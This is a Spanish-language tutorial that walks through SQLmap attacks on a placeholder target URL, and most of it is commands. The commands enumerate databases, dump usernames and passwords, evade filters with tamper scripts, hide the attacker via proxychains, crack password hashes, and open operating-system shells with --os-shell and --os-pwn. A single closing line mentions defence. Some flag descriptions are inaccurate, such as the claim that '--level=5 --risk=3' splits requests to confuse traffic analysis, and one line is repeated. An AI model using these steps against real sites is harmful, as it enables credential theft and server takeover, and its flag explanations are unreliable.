Este tutorial es para los que creen que probar SQL Injection es escribir comillas en un campo de texto. Aquí vamos a llevar SQLmap al siguiente nivel. Rápido, directo y sin rodeos.
Preparación del entorno
Primero, asegúrate de tener SQLmap instalado. Si usas Linux:
Código:
sudo apt update && sudo apt install sqlmap
Para Windows, descárgalo desde su página oficial.
(Usa una máquina virtual o VPN para mantenerte seguro mientras experimentas.)
Primer escaneo: Básico pero funcional
Para probar rápidamente si un sitio es vulnerable:
Código:
sqlmap -u "http://target.com/vuln.php?id=1" --dbs
-u: La URL objetivo.
--dbs: Enumera las bases de datos disponibles si encuentra vulnerabilidades.
--dbs: Enumera las bases de datos disponibles si encuentra vulnerabilidades.
Extracción de información (Bases de datos, tablas y columnas)
Obtener bases de datos:
Código:
sqlmap -u "http://target.com/vuln.php?id=1" --dbs
Elegir una base de datos y sacar tablas:
Código:
sqlmap -u "http://target.com/vuln.php?id=1" -D targetdb --tables
Ver columnas de una tabla:
Código:
sqlmap -u "http://target.com/vuln.php?id=1" -D targetdb -T users --columns
Sacar datos (usuarios y contraseñas):
Código:
sqlmap -u "http://target.com/vuln.php?id=1" -D targetdb -T users -C username,password --dump
Saltarse restricciones (Bypass)
Usar técnicas de evasión:
Código:
sqlmap -u "http://target.com/vuln.php?id=1" --tamper=space2comment
Con ProxyChains para anonimato:
Código:
proxychains sqlmap -u "http://target.com/vuln.php?id=1" --dbs
Dividir peticiones para confundir el análisis de tráfico:
Código:
sqlmap -u "http://target.com/vuln.php?id=1" --level=5 --risk=3
Automatizar fuerza bruta
Si quieres probar contraseñas rápidamente:
Código:
sqlmap -u "http://target.com/vuln.php?id=1" --passwords
Prueba diccionarios personalizados:
Código:
sqlmap -u "http://target.com/vuln.php?id=1" --wordlist=users.txt
Subir shells (para auditorías internas)
Subir un shell interactivo directamente:
Código:
sqlmap -u "http://target.com/vuln.php?id=1" --os-shell
Acceder al sistema operativo si el servidor es vulnerable:
Código:
sqlmap -u "http://target.com/vuln.php?id=1" --os-pwn
SQLmap no es solo para encontrar vulnerabilidades; es para entender cómo funcionan las aplicaciones y cómo protegerlas. Si algo no debería estar expuesto, avisa antes de explotarlo.